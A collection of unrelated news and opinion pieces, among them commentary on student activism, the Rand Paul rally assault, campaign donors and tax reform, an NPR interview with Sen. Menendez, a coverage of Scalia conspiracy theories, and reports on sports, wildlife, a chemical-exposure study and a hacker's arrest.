Today , the technology that students imagine delivering the globe to them just as effectively delivers their minds and emotions to marketers and propagandists for whom their atomized selves are no match . Colleges and universities , meanwhile , abet the emPodding of their students , spending millions on hardware and reconfigured infrastructure in a race for bragging rights as the `` most wired '' school in America .
Most detrimental to the kind of student mobilizations that closed campuses 40 years ago are the junior-year-abroad programs that began to expand after Kent State . For most students , their first term on the campus is an orientation to college life ; the second term is a time to sample some organizational involvements . Those interests deepen during the early months of the second year , and a new generation of leaders begins to emerge . Then , the enticements of study abroad wash over the class : Oxford for poets , Rome for artists , and Oaxaca for anthropologists . Who can resist ?
It 's the best and brightest who get the tickets , of course , and by spring break of sophomore year , the class leaders , the ones who might have gone to Port Huron in 1962 , set their sights ahead and begin withdrawing their commitments to the campus community . On an annual basis , the friendship networks and organizational connections that might have grown into a Free Speech Movement in 1964 are fractured and left for the next year 's first-term sophomores to rebuild . Seniors returning from overseas have majors to complete , LSAT 's and GRE 's to master , and the next round of application forms to fill out—little time to make a better campus , let alone end a war .
Political projects like Students for a Democratic Society in the 1960s developed with the guidance of student leaders who were committed to something beyond their own four or five years as undergraduates—and then sometimes evolved into community or workplace organizing projects that lasted many more years . Today , the institutional realities of student life make it hard for undergraduates to sustain commitments beyond 18 months .
When President Barack Obama broke the color barrier to the White House in 2008 , pundits noted the large numbers of student campaigners and voters who turned out for him . We ca n't be sure , though , whether their presence in the campaign was a difference-maker or just different looking when viewed against the backdrop of the campus quietude we had become accustomed to .
In January , President Obama turned out for Martha Coakley 's run for the Massachusetts Senate seat left vacant by Edward Kennedy 's death . But college students did not . Maybe disappointment with Obama 's surge in Afghanistan had turned students to the left , and they took it out on the Democratic Party . But not likely . A forum on the war I attended late last year ended with the same exasperation as others in recent years : Where are the students ?
The 60s remembered through the photograph of a Kent State student lying lifeless on the ground has even less appeal for students in 2010 than for the Class of 1970 . But histories of that period also record the correlation between student activism and changes that made this country better : students sitting in for racial integration in Greensboro ; students standing up for free speech in Berkeley ; and students marching on the Pentagon for peace in Vietnam .
Better than questions about the lethargy of student activism in 2010 are inquiries into the times . Where are the 60s ? It 's the times that have changed , not the students . It 's the administrative practices and economic circumstances incubating campus culture that have changed . Those conditions did n't change on their own , however , and they wo n't change themselves again .
As soon as I saw the video , I knew it was destined to be played on an endless loop on the news networks . A couple of Rand Paul supporters outside a debate between Paul and his opponent for Kentucky senate , Jack Conway , pinned a MoveOn.org activist to a curb with deliberation before one of them stomped on her head , luckily with enough ineptness that the victim was left only with a minor concussion .
It was a shocking example of inchoate rightwing rage turned to violence , displayed in a way that Americans associate solely with white supremacists .
But it was more than that . The entire incident had a whiff of not just election rage , but of gendered violence . Large men stripping a wig off a slight , unarmed woman and pinning her to the ground ? Not exactly the chivalry that conservative men like to wax on about . To make it worse , the stomper demanded an apology from his victim , echoing the battle cry of wife- and child-beaters everywhere : `` See what you made me do ? ! ''
All this happened , coincidentally , on the same night that MSNBC aired a documentary called The Assassination of Dr Tiller that looked into events surrounding the killing of abortion provider Dr George Tiller , after a previous bombing of his clinic and a direct attempt on his life . He was the 8th person murdered by anti-choice extremists .
There are many beliefs that propel rightwing rage , but anti-feminism is one of the few that manages to inspire so much violence . Indeed , in all this talk about taxes , economic stimulus packages and other policy issues , let 's not forget how much gender-based rage is motivating the hard right this election .
The men who attacked the MoveOn activist seemed sent from central casting on a call for `` rightwingers with massive masculinity issues '' . The stomper himself was swiftly outed as a man named Tim Profitt and police summons were issued against him . It also turned out that he worked for the Rand Paul campaign , as the Bourbon County coordinator , a position from which he was hastily dismissed .
Mike Pezzano , the man who held down the victim , Lauren Valle , helps organise for an `` open carry '' organisation – basically , a group of gun nuts who feel that it 's just not as fun carrying their steel phallic symbols around unless everyone can see them . ( As Gawker noted , `` [ T ] hese guys are walking arguments against the second amendment . They ca n't even be trusted with their own feet . '' ) Barefoot and Progressive took a screenshot of Profitt 's Facebook page , and , of course , anti-choice politics are right at the top . Toting guns and making sure women who get pregnant stay pregnant – the twin favourite issues of the anxious masculinity set .
The Paul campaign is a natural home for anyone who harbours resentments about women 's changing roles in society . Paul is strongly anti-choice , opposing abortion rights even in cases of rape or incest , and supporting laws that would likely be used to challenge women 's rights to some forms of birth control . His father , Ron Paul , who paved the way for running as a `` libertarian '' kind of conservative , opposed the Violence Against Women Act . Despite his support for forcing pregnant women to bear children whether they like it or not , Paul opposes having the state pay for childbirth for women who ca n't afford it . If you have a uterus , it seems there 's nothing you can do with it that 's acceptable .
Not that Paul is alone in this . The entire campaign season has been a sea of sexist and downright misogynist pandering from Republican candidates . Senate candidate Ken Buck mocked his primary opponent Jane Norton for wearing high heels . Sharron Angle decried maternity leave and has denounced working mothers . Carl Paladino won the Republican primary even after it was revealed he enjoys sending out emails full of brutally misogynist porn , including a picture of a woman being penetrated by a horse .
The fact that there are many female candidates has n't changed this equation , either . In fact , sexist pandering is one of the favourite tactics of female Republicans , in the form of insinuating that their opponents are emasculated . Ken Buck defended his mocking of Norton 's sex , because she had already made digs at his manhood . As the Washington Post reports , practically every female Republican candidate uses emasculation as a weapon to make themselves look tougher : Sharron Angle told Harry Reid to `` man up '' , Christine O'Donnell took swipes against her primary opponent Mike Castle 's manhood and sexual orientation , and Sarah Palin accused President Obama of not having `` cojones '' .
Outsiders looking in would be forgiven for thinking American politics is basically a contest over who has the biggest package ; and since it 's a metaphorical package , women feel like they get to play now , too .
The relentless exploitation of gender and sexual anxieties by Republican candidates and pundits has left the conservative base an incoherent , but very angry mess . For evidence , I present this video of Rachel Maddow interviewing Republican senate candidate Joe Miller 's supporters . They 've been reduced to a fact-free rant of fear that someone is coming to take their guns and anger that women are allowed to say no to unwanted pregnancies . Real political concerns left the room long ago , pushed out by overwhelming misogynies .
A Look At Democrats ' Chances In The Midterms
Last week , All Things Considered spoke with Sen. John Cornyn , the head of the National Republican Senatorial Committee . Today , NPR 's Michele Norris talks to Sen. Robert Menendez , chairman of the Democratic Senatorial Committee , about the Democrats ' chances in next week 's election .
MICHELE NORRIS , host :
Last week , we spoke with Senator John Cornyn , the head of the National Republican Senatorial Committee . Today , to campaign efforts on the other side of the aisle . Senator Robert Menendez of New Jersey chairs the Democratic Senatorial Campaign Committee , and he joins us now .
Senator Menendez , welcome to the program .
Senator ROBERT MENENDEZ ( Democrat , New Jersey , Chairman , Democratic Senatorial Committee ) : Thank you . Good to be with you .
NORRIS : Republicans are counting on this thing they call the enthusiasm gap to help deliver voters to their side going into the elections on November 2nd . Is that more than just political rhetoric ? Are Republicans at this point more motivated at the grassroots level than Democrats ?
Sen. MENENDEZ : Well , I think the reality is , is that the Tea Party , which is totally militated in the Republican Party and has also defeated several of their mainstream candidates , including incumbent U.S. senators , has generated a lot of enthusiasm in their party . And there is no question about that . We constantly have to remind the voters : Is negativity and no the solution to our problems ? Because that 's all that Republicans have had for the last two years .
I mean , when you see Mitch McConnell say that my number one job as the Republican leader in the Senate is to make sure that Barack Obama is a one-term president , I would think that his number one job should be to help us turn this economy around .
NORRIS : Let me ask you about the politics of some of the candidates in your own party . How concerned are you when Democrats seem to be running away from core Democratic issues or from the president himself ? I 'm thinking about a West Virginia candidate , like Joe Manchin .
Sen. MENENDEZ : Well , look , our party is truly a big tent party , and that means we have liberal , conservative and centrist Democrats . And people represent in the first instance the views and values of their state . So I 'm not surprised that Governor Manchin is doing what he has always done : stood up for West Virginia and strike a responsive chord with the electorate in his state .
NORRIS : Was it a mistake for President Obama not to endorse the Democrat in Rhode Island because of his friendship with Lincoln Chafee , an independent ? Did he put friendship above party loyalty ?
Sen. MENENDEZ : Well , you know , the president gets to choose who he endorses , as I get to choose who I endorse . Clearly , from my perspective , I would have endorsed the Democratic candidate for governor .
NORRIS : So you 're disappointed that he chose to do that ?
Sen. MENENDEZ : I just have a different view .
NORRIS : Hmm . What 's going to influence turnout in these last days ?
Sen. MENENDEZ : I think , as voters hone in on these final days , they 're going to think about : What is my choice ? And when they come out to vote , I think the contrast of choosing someone who wants to move forward versus someone who wants to go backwards is going to be the core . I mean , you know , the last time I checked if you want to move forward , you put your car in D for Democrat and drive . If you want to go backwards , you put it in R for reverse and Republican .
NORRIS : Now I mean no disrespect , but you know what the Republicans will say , that if you want to rev up the economy , that you vote R. And if you want to drive the economy down further , you vote D .
Sen. MENENDEZ : Well , you know , I do n't think that they have valid currency . History ca n't change the fact that when Ben Bernanke came to members of the banking committee , of which I 'm one , in November of 2008 , and said we 're going to have a series of financial institutions collapse . And if they collapse , they will create a global financial meltdown . That 's the reality . That 's what the Republicans left us . And that 's why an overwhelming margin in just about every poll I 've seen when people are reminded of that reality they choose to move forward with Democrats .
NORRIS : Now , I hear you talk about the problems that you inherited , looking backwards . At some point , though , is n't a sign of leadership taking full responsibility for the hand that you 're dealt ?
Sen. MENENDEZ : Well , I think ...
NORRIS : Taking ownership ?
Sen. MENENDEZ : ... we have taken full responsibility for the hand that we 're dealt . That does n't mean , however , that we have an absence of history . You know , you ca n't , after two wars raging abroad unpaid for , tax cuts to the wealthiest people in the country unpaid for , and a Wall Street that was allowed to go unchecked - all happening during the Bush years - believe that an economy of the size of this nation can be turned on a dime . And so we have taken responsibility .
That 's why we passed the Recovery Act . That 's why we passed the HIRE Act . That 's why we passed the Small Business Act . That 's why we reformed health care to get cost under control . And I could go on and on . We have taken responsibility . But what is amazing to me is that Republicans both want us to forget history , short-term history , nor that they have any responsibility for co-joining in government and are using all of their powers to obstruct .
NORRIS : Senator Menendez , it 's been great talking to you . Thank you very much .
Sen. MENENDEZ : Thank you , Michele , great to be with you .
NORRIS : Senator Robert Menendez of New Jersey is in charge of the Democratic Senatorial Campaign Committee . Last week , we spoke with his Republican counterpart , Senator John Cornyn . He runs the National Republican Senatorial Committee .
Copyright © 2010 NPR . All rights reserved . Visit our website terms of use and permissions pages at www.npr.org for further information .
NPR transcripts are created on a rush deadline by Verb8tm , Inc. , an NPR contractor , and produced using a proprietary transcription process developed with NPR . This text may not be in its final form and may be updated or revised in the future . Accuracy and availability may vary . The authoritative record of NPR 's programming is the audio record .
Police were searching for group who stole a sea lion pup from its mother on Dockweiler State Beach . Kate Larsen reports for the NBC4 News at 5 p.m. on Sunday , April 19 , 2015 . ( Published Monday , April 20 , 2015 )
A sea lion pup was kidnapped on a Los Angeles beach Sunday morning , a witness told police officers . Now , an investigation is underway to find the missing pup and its kidnappers .
Two pups that made their way onto Dockweiler State Beach were being harassed by a group of people at about 3:30 a.m. , the witness said , according to Los Angeles Police Department officers . Reports stated that the group was throwing things at the sea lions , including cinder blocks .
They took a blanket out of a car , wrapped up one of the sea lions and took off with the animal in a black Honda Civic , police said .
When officers arrived , they found the second sea lion trying to make its way out of some bushes and back to shore . That pup was able to escape its attackers and was picked up by Marine Animal Rescue .
Southern California Animals in the News
Keeping a sea lion is a federal crime , and can be very difficult and dangerous -- they bite harder than a pit bull and have `` the dirtiest mouth of any mammal , '' said Peter Wallerstein of Marine Animal Rescue , who said this was his 321st rescue of the year , more than the entirety of 2014 .
`` They could get bitten , they could get infected , '' Wallerstein said of the people who kidnapped the animal . `` The sea lions can inflict a very serious bite . ''
The Marine Mammal Protection Act makes feeding and harassing sea lions illegal . An LAPD spokesman said the National Oceanic and Atmospheric Administration , which is a federal agency that tracks sea lion strandings in Southern California , is investigating the possible kidnapping .
The sea lion attackers and kidnappers could face fines up to $ 10,000 and possibly up to one year jail time .
Sea lion strandings and interactions with humans have been much more frequent than normal in the last few years . Last week , a sea lion walked about five blocks to a San Diego-area high school .
A rescue group in Laguna Beach said they are treating twice as many malnourished sea lions as last year . Statewide , rescue centers have taken in more than 1,600 marine mammals , which is three to four times the normal average .
2015 Southern California Images in the News
`` We 've doubled our rescues and there seems to be no end in sight , '' Wallerstein told NBC4 in March .
Scientists think warmer-than-usual ocean waters are pushing away sea lions ' favored foods , leaving them struggling to find something to eat .
`` These sea lions need a specialized food supply , '' Wallerstein said .
Wallerstein said underfed sea lions get out out of and as far away from the water as possible because they do n't have as much body fat as they should and get cold easily .
If you see a sea lion or seal , call lifeguards or marine mammal rescue , but do n't go near it , he said .
City News Service contributed to this report .
Stoner arrived in the premier class in Lucio Cecchinello 's team in 2006 , after having signed a contract with Sito Pons , whose team folded when it lost major sponsor Camel to Yamaha .
The young Australian seemed to be overshadowed by Dani Pedrosa , who joined the factory Honda squad alongside Nicky Hayden with back-to-back 250cc titles under his belt , but it only took until the second race of the year in Qatar for him to show his potential .
He had missed three flights but managed to arrive to the circuit for the first practice session - and once he was there , he set the best time and repeated the feat on Saturday , scoring his first pole position .
The next round of the season was in Turkey , and there he achieved his first podium with a second-place finish behind Marco Melandri .
But just as everything seemed to be falling in place for a brilliant season , he started to crash - frequently .
“ There were 23 crashes in total during that year and all of them were because of the front tyre , '' explains Forcada , who like Stoner found refuge at LCR when Sito Pons was forced to disband his team .
`` Casey needed to really feel the front end of the bike , he did n't care about the rear . ''
Stoner finished that year taking eighth place in the standings with 133 points less than that year 's champion Hayden , having failed to finish seven times . The Michelin tyres he used did n't suit his riding style , especially the front .
This fact became clear the following year after the 21-year-old signed with Ducati , which used Bridgestone tyres , and became world champion by scoring 10 of a possible 18 victories .
Forcada adds : `` Each time we met he said , 'This bike is not fantastic , but the front tyre allows me to do whatever I want . That 's the only secret ' . ''
The veteran Spanish engineer , who now works with Yamaha starlet Maverick Vinales , was crewed chief to Stoner 's replacement Carlos Checa in 2007 , before becoming one of the key architects of Jorge Lorenzo 's three championship titles in 2010 , 2012 and 2015 .
Describing Stoner 's characteristics , Forcada is clear : “ He 's a beast on the bike .
`` He knew why he was fast , I suppose , but that was not the case for us . You had to give him the bike as he exactly wanted it , and then he was able to do something great .
`` He could arrive at a track without knowing it at all , and manage to set the record on his third lap . ''
He adds : “ Physically , he was n't a greek sculpture and did n't take care of himself , some days he rode the bike having eaten just a chocolate bar .
`` This is how he got his first pole : he had missed his flight and arrived when the practice session was about to start - and he only had eaten a chocolate bar that someone gave him in the car !
`` But I have never known someone with such an innate talent as him . He could have won as many titles as he wanted . ''
Translation by Irene Aneas
S T A T E O F N E W Y O R K ________________________________________________________________________ 980 2017-2018 Regular Sessions I N A S S E M B L Y January 10 , 2017 ___________ Introduced by M. of A. PAULIN , ZEBROWSKI , MOSLEY , GOTTFRIED , MAGNARELLI , OTIS , QUART , KAVANAGH , WALKER , BRONSON , FAHY , STECK , BUCHWALD , SEAWRIGHT -- Multi-Sponsored by -- M. of A. GALEF , RICHARDSON , RIVERA , SIMON , THIELE -- read once and referred to the Committee on Codes AN ACT to amend the criminal procedure law , in relation to orders to surrender eligible weapons THE PEOPLE OF THE STATE OF NEW YORK , REPRESENTED IN SENATE AND ASSEM- BLY , DO ENACT AS FOLLOWS : Section 1 . Section 370.15 of the criminal procedure law is amended by adding three new subdivisions 4 , 5 and 6 to read as follows : 4 . UPON JUDGMENT OF CONVICTION AND DETERMINATION OF THE DEFENDANT TO BE RELATED OR SITUATED TO THE VICTIM AS SET FORTH IN THIS SECTION , THE COURT SHALL REQUIRE THE RESPONDENT TO INFORM THE COURT OF ALL FIREARMS , RIFLES , SHOTGUNS , BLACK POWDER RIFLES , BLACK POWDER SHOTGUNS , MUZZLE- LOADING FIREARMS OR ANTIQUE FIREARMS HE OR SHE OWNS OR POSSESSES . THE COURT SHALL ORDER THE IMMEDIATE SURRENDER PURSUANT TO SUBPARAGRAPH ( F ) OF PARAGRAPH ONE OF SUBDIVISION A OF SECTION 265.20 OF THE PENAL LAW AND SUBDIVISION SIX OF SECTION 400.05 OF THE PENAL LAW , OF ANY OR ALL FIREARMS , RIFLES , SHOTGUNS , BLACK POWDER RIFLES , BLACK POWDER SHOTGUNS , MUZZLE-LOADING FIREARMS OR ANTIQUE FIREARMS OWNED OR POSSESSED BY THE DEFENDANT . 5 . THE COURT ORDERING THE SURRENDER OF ANY FIREARM , RIFLE , SHOTGUN , BLACK POWDER RIFLE , BLACK POWDER SHOTGUN , MUZZLE-LOADING FIREARM OR ANTIQUE FIREARM AS PROVIDED IN THIS SECTION SHALL IMMEDIATELY NOTIFY THE DULY CONSTITUTED POLICE AUTHORITIES OF THE LOCALITY OF SUCH ACTION AND THE DIVISION OF STATE POLICE AT ITS OFFICE IN THE CITY OF ALBANY . THE COURT SHALL DIRECT THE AUTHORITY RECEIVING SUCH SURRENDERED FIREARMS , RIFLES , SHOTGUNS , BLACK POWDER RIFLES , BLACK POWDER SHOTGUNS , MUZZLE- LOADING FIREARMS OR ANTIQUE FIREARMS TO IMMEDIATELY NOTIFY THE COURT OF SUCH SURRENDER . EXPLANATION -- Matter in ITALICS ( underscored ) is new ; matter in brackets [ ] is old law to be omitted . LBD01087-01-7
A new study has found that Cincinnati women exposed to a chemical during their pregnancies had children who had more body fat by age 8 . ( Photo : File )
Cincinnati children tended to put on more weight faster when their mothers had been exposed during pregnancy to a chemical used in fire suppressant and nonstick surface coatings , a new study released Wednesday has found .
Led by a researcher at Brown University , the study echoes findings from a 2013 University of Cincinnati study that found the same chemical in the blood of young girls in Cincinnati and Northern Kentucky .
The Brown University study is significant for adding evidence that human-made chemicals appear to trigger obesity , even when the chemical passes from the pregnant mother to her child . Excess weight in children can be a harbinger of Type 2 diabetes later in life .
The new study was published Wednesday in the journal Obesity . Epidemiologist Joseph Braun of Brown University led the research team , which included Drs . Aimin Chen of UC and Kimberly Yolton of Cincinnati Children 's Hospital Medical Center .
“ Pregnant women in the homes studied had a higher concentration of this chemical in their blood , in fact , two times higher than pregnant women in the United States , ” Braun said . “ And children born to these women have a higher body mass index and waist circumferences . ”
The research team followed 204 pregnant women in Cincinnati from 2003 until 2006 , through their deliveries and as their children grew to age 8 . In the pregnant women and later in their children , the researchers measured the amount of perfluorooctanoic acid , the chemical agent . The women were put in three groups , depending on the amount of the chemical in their blood .
The children in the study were measured as they grew . Children whose mothers were in the middle group of chemical exposure had 2.5 pounds more body fat , the study found . The children whose mothers were in the top group of chemical exposure had almost a pound more body fat .
Perfluorooctanoic acid was among the chemicals dumped into the Ohio River at DuPont 's Washington Works plant in Parkersburg , West Virginia , from the 1950s until the early 2000s . The chemical is used in the manufacture of fire extinguisher material and nonstick coatings for cookware . In 1992 , the Greater Cincinnati Water Works installed special filters on river intakes to clean the chemical from the water . Water Works officials said this week the chemical levels in Cincinnati water are better than the federal government requires for safety .
The Brown study released Wednesday speculated that the pregnant mothers may have been exposed to the chemical through drinking water . But Braun added that exposure could have come from the environment in other ways .
NEWSLETTERS Get the News Alerts newsletter delivered to your inbox We 're sorry , but something went wrong Be the first to be informed of important news as it happens in Greater Cincinnati . Please try again soon , or contact Customer Service at 1-800-876-4500 . Delivery : Varies Invalid email address Thank you ! You 're almost signed up for News Alerts Keep an eye out for an email to confirm your newsletter registration . More newsletters
“ Exposure is n't an all-or-nothing thing . It 's not like you have it or you do n't , ” Braun said . “ It 's a continuum . There 's a perception that it 's a minority problem , a poor people 's problem , if you live near the power plant or the freeway . For some of these chemicals , the chemical does n't respect how much money you have or where you live . ”
The mothers in the Brown survey had an average age of 29 and an average annual household income of $ 55,000 . Sixty percent were Caucasian , 62 percent were married and 45 percent had at least a college degree .
The 2013 UC study checked the blood of girls between ages 6 and 8 in Cincinnati , Northern Kentucky and San Francisco for perfluorooctanoic acid and other chemicals in that family . The girls in Cincinnati , however , had lower levels of the chemical in their blood than the Northern Kentucky girls , which prompted water officials in Northern Kentucky to adopt a similar water filtration system .
Read or Share this story : http : //cin.ci/1iUyUr9
As the hung jury in Senator Menendez 's political corruption trial shows , proving a quid pro quo is notoriously difficult -- especially as the Supreme Court continually makes proving corruption harder and harder as they did most recently in McDonnell .
Now Congress and the President are attempting to overhaul the tax code by slashing taxes for corporations and for those at the highest end of the income distribution . Despite rhetoric from the business community , the data shows corporations are doing just fine . Total after tax corporate profits in 2016 were up 2.2 percent over 2015 , and only 3.3 percent down from the record-high year of 2014 , according to the Commerce Dept . Of course , tax “ reform ” comes on the heels of the failure to repeal the Affordable Care Act , which also included a tax cut package for the rich .
Republican contributors were not amused by the Senate 's lack of accomplishment and withheld money for the 2018 campaign . Donations to Senate Republicans went from $ 7 million in March to only $ 2 million in July and August , “ a poor showing for a majority party with a decided advantage on the midterm map , ” wrote The New York Times .
Now it 's no surprise the wealthy put money into politics seeking tax benefits for their businesses , themselves and their heirs . But what is different this year is the surprising candor of both donors and recipients – officeholders allegedly representing all of their constituents , rich and poor alike – about the transactional nature of the game . The equation could not be simpler : donations in exchange for tax cuts .
Take the case of Doug Deason . Seven years ago his father , Darwin , sold his company to Xerox for $ 6.4 billion . Doug is Darwin 's only child , and a major GOP donor . In June , Doug Deason announced the “ Dallas piggy bank ” is closed until there is progress on health care and taxes . Deason said he had already refused to host fundraisers for two House Republicans . “ Get Obamacare repealed and replaced , get tax reform passed , ” Deason demanded of the GOP . “ You control the Senate . You control the House . You have the presidency . There 's no reason you ca n't get this done . Get it done and we 'll open it [ fundraising ] back up . ”
Earlier , the Koch Brothers ' network was crystal clear about the fallout if Congress failed to pass tax reform : “ If they do n't make good on these promises [ for tax reform ] ... there are going to be consequences , and quite frankly there should be , ” said Sean Lansing , chief operating officer of the Koch network 's political arm , Americans For Prosperity .
Steven Law , president of the Senate Leadership Fund , a GOP Super Pac affiliated with Senate Majority Leader Mitch McConnell , was equally blunt . “ Tax reform is a must-do for Republicans , ” he told the New York Post . “ [ Donors ] would be mortified if we did n't live up to what we 've committed to on tax reform . ”
Members of Congress have been frank among themselves and the public . In a private meeting of GOP Senators in mid-September , Sen. Cory Gardner ( Colo. ) , chair of the National Republican Senatorial Committee , reportedly said , “ Donors are furious ... We have n't kept our promise [ on the Affordable Care Act and taxes ] . ” Tax reform 's financial importance to the GOP was made obvious earlier this month when Sen. Lindsey Graham ( R-S.C. ) told an NBC News reporter “ financial contributions will stop ” if tax reform does not pass .
In the House , Rep. Chris Collins ( R-N.Y. ) related what he was hearing from his financial backers about tax reform : “ My donors are basically saying , ‘ Get it done or do n't ever call me again. ” ' His colleague , Rep. Dave Brat ( R-Va. ) , forecast a bleak result for the GOP in the midterm elections if tax reform does not pass , “ We do n't get taxes through , we 're all going home . Pack the bags . ”
Meanwhile , the White House is n't even pretending that tax “ reform ” is supported by the voters , which probably makes sense according to the polls . White House National Economic Council Director Gary Cohn told CNBC , “ The most excited group out there are big CEOs about our tax plan. ” He added , “ So , our biggest supporters are really the Business Roundtable , ” referring to an organization of CEOs of the nation 's largest companies that has spent millions in ads backing the bill .
Voters , however , look at the GOP tax plan a little differently . According to a Quinnipiac University poll released last week , voters oppose tax “ reform ” by more than 2:1 , with 52 percent disapproving and only 25 percent approving . Only a relatively slim majority of 60 percent of Republicans even support the package . Most striking is that even the rich are not convinced that cutting corporate taxes is a good idea . A majority of those with household incomes in the $ 100,000 to $ 250,000 range oppose cutting corporate taxes ( 54 percent ) , and only 50 percent of households with incomes above $ 250,000 support it . Overall , 71 percent of voters say the plan will either raise their taxes or not have much impact .
It 's clear that incumbents have calculated that it 's more important to first keep donors happy , and then try to win over voters – even if their taxes increased – with a wave of campaign spending later .
What 's astonishing about the past few months is that both donors and lawmakers are openly acknowledging a deal in which the tax bill passes in exchange for financial support . Quid pro quos are usually not so blatant . Perhaps our ability to be shocked by political corruption is slowly being eroded .
The views expressed are the author 's own and not necessarily those of the Brennan Center for Justice .
( Image : ThinkStock )
Scalia truther artwork - Twitter screenshot
It did n't take long after news broke that Justice Antonin Scalia had died at a Texas hunting lodge before conspiracy theorists came to the “ logical ” conclusion that the 79-year-old jurist with health problems had been murdered .
From the first moon landing to the the 9/11 attack on the Twin Towers to the slaughter that took the lives of 26 innocents at Sandy Hook — there is no shortage of skeptics in the U.S. who see nefarious actors behind every event big or small .
Even before My San Antonio reported that lodge owner John Poindexter said , “ We discovered the judge in bed , a pillow over his head . His bed clothes were unwrinkled , ” people began speculating online that Scalia had been murdered .
Leading the list of reasons was a backlog of cases involving abortion , affirmative actions , unions and the 2nd Amendment before the Supreme Court that could stall out with the loss of the court 's most conservative justice .
No discussion of conspiracy theories in America can begin without first checking in with Alex Jones of Infowars , who immediately posted a “ emergency transmission ” on his Facebook page Saturday night after news of Scalia 's death was announced .
According to Jones , Scalia had likely been murdered by President Obama in much the same manner the president killed conservative gadfly Andrew Breitbart , who died on a Brentwood sidewalk from a heart attack .
“ You just get used to this , ‘ Scalia found , it 's natural , nothing going on here , he just died naturally , ' ” Jones stated . “ And you 're like , ‘ Whoa . Red flag . ' Then you realize , Obama is one vote away from being able to ban guns , open the borders and actually have the court engage in its agenda — and now Scalia dies . I mean , this is hard core . ”
Jones went on to suggest that Associate Justice Clarence Thomas — with a voting record nearly identical to Scalia 's — might “ die of a heart attack next week . ”
“ Are they going to kill Clarence Thomas ? Maybe they 'll kill Ron Paul . Maybe they 'll kill Donald Trump next . They all had heart attacks , ” he continued . “ How many more of these are we going to sit here and put up with ? Or maybe their airplane blows up . My gut tells me they killed him and all the intellectual evidence lays it out . ”
Conservative trendsetter Matt Drudge also jumped on the “ Scalia murdered ” bandwagon with a screaming red headline reading : “ Scalia found dead with ‘ pillow over head ' . ”
On YouTube , a man identifying himself as the NatureHacker pointed the finger at lodge owner Poindexter , noting he was a Vietnam era veteran who was awarded the Presidential Unit Citation by President Obama in 2009 in a nationally televised ceremony in the Rose Garden .
As usual , Twitter , was a bastion of reasoned thought , with the president the most likely culprit :
Since Justice Scalia was murdered , Obama is planning on finishing off America by appointing justice votes idealogy ! pic.twitter.com/g0MTM3iTT9 — Barbara Ann ( @ daynutrition ) February 15 , 2016
Murdered Scalia set to rule on guns , sep. of church and state , immigration , Obamacare , climate change https : //t.co/174pLrFUaX via @ DrEowyn — Colleen 4 Trump ( @ colleenbrown711 ) February 15 , 2016
US Supreme Court Judge # Scalia may have been murdered , and you all are acting as if it is a normal day . The rot of socialism has set in . — 3XT1 AJ Bains ( @ 3XT1 ) February 15 , 2016
@ DocThompsonShow @ skiplacombe # WhatILearnedToday Starting to think Scalia was murdered . This administration lies so much it is believable — Zac Bonesteel ( @ ZacBonesteel ) February 15 , 2016
The delightfully tongue in cheek “ pourmecoffee ” has all the evidence America 's “ truthers ” need :
I am working on Scalia conspiracies . It 's going to be a long night pic.twitter.com/nEH0Yrn6Hb — pourmecoffee ( @ pourmecoffee ) February 15 , 2016
Man who claims he attacked Columbia , KOMU websites jailed in AZ
APACHE JUNCTION , ARIZONA - CNN affiliate KNXV-TV in Phoenix , Arizona reports the man who refers to himself as the `` Bitcoin Baron '' has been jailed without bond in Arizona after being accused of computer tampering and hacking into Arizona government agency websites .
Randall Charles Tucker who uses the pseudo-name , the `` Bitcoin Baron , '' is the same person who sent an email to KOMU in December claiming he attacked Gocolumbiamo.com and then KOMU.com .
According to court documents , authorities served a search warrant at the home of Randall Charles Tucker Thursday , April 9 after a six-month investigation . A computer was discovered and seized from Tucker 's bedroom . The computer was found to have an operating system installed designed for use by hackers .
Tucker 's next court appearance is for Monday , April 20 in Arizona .
TREVOR LEWIS
This season : 73 games , 6 goals , 5 assists , 11 points , 6 penalty minutes , -1 rating , 13:15 time on ice
The good : There 's nothing flashy about Trevor Lewis ' game , and that 's meant complementary . A blue collar , responsible forward who has provided the Kings tough minutes – if not consistent production – in his four full years with the club , Lewis is a player who is still doing things to help his team win hockey games even when he 's not scoring . He 's among Darryl Sutter 's top choices to kill penalties , averaging 1:52 of shorthanded ice time in 2013-14 . He 's also terrific at drawing penalties . Lewis ' +18 penalty differential led the Kings and ranked ninth in the league , trailing the likes of Matt Duchene , Tyler Seguin , Nathan MacKinnon and T.J. Oshie – all of whom received significantly more minutes . Lewis ' path towards setting a career-high in goals was a bizarre one . After being held without a goal for his first 38 games , he scored his career-high sixth goal in his 66th game , and with goal totals of three , three , five and six in his four seasons , his four goals in 26 playoff games certainly helped the cause . He 's among Los Angeles ' most versatile forwards and can play all three positions , though he appears now to be giving the team the most value as a third line right wing , or a fourth line center or right wing . “ That 's how we 've handled him since we 've been here , ” Darryl Sutter said in January . “ He 's played somewhere between the third and fourth line , penalty kill , plays right wing-center . It does n't matter home-road . He wants to score more , and you want him to score more . Six is a career-high for him , so that 's why you 're writing about it , talking about it . Hey , you want him to score . That was always our target . When you talk to him at the end of the year we won the Cup , we wanted him to score 15 goals. ” The 15 goals are a stretch at this point , but Lewis remains a seamless , character fit in the team 's room who forechecks , affords little space when defending , and effectively takes care of many of the Little Things that help teams win hockey games .
Jarret Stoll , on Trevor Lewis scoring twice in a win at St. Louis on January 16 :
It 's great . You should 've seen our bench when we came back . Kinger knew he did n't kick that one in , so we knew our second one was Lewie 's . It 's great . He works so hard . He does a lot of the details within our game , within our system . A lot of stuff does n't get noticed when you 're writing articles or seeing highlights on TV , but for a teammate , for how he works , he 's a great teammate , so it was good to see him be rewarded .
The bad : He tends to defend more than any other King forward . There are others counted on to drive and maintain possession more than Lewis – and Corsi is n't generally a statistic that will ever provide a satisfactory account of Lewis ' contributions – but his 53.4 % Corsi percentage was five percentage points below the team mean during five-on-five play and dropped in the postseason . Lewis is not among the most highly skilled members of the team , and after finishing with a 2.9 % shooting percentage through his first two full seasons , has maintained a 5.4 % shooting percentage since the 2012-13 work stoppage . His ice time was 1:57 off his 2012-13 career-high of 15:12 , and despite appearing in 25 more games , Lewis finished with three fewer points than the previous season . He was an irregular minus-7 against Chicago in the Western Conference Final and logged only 5:47 of ice time in the double overtime series clincher . His 48.5 % faceoff percentage was the lowest amongst the Kings who took at least 250 faceoffs ( Stoll , Richards , Kopitar , Carter ) .
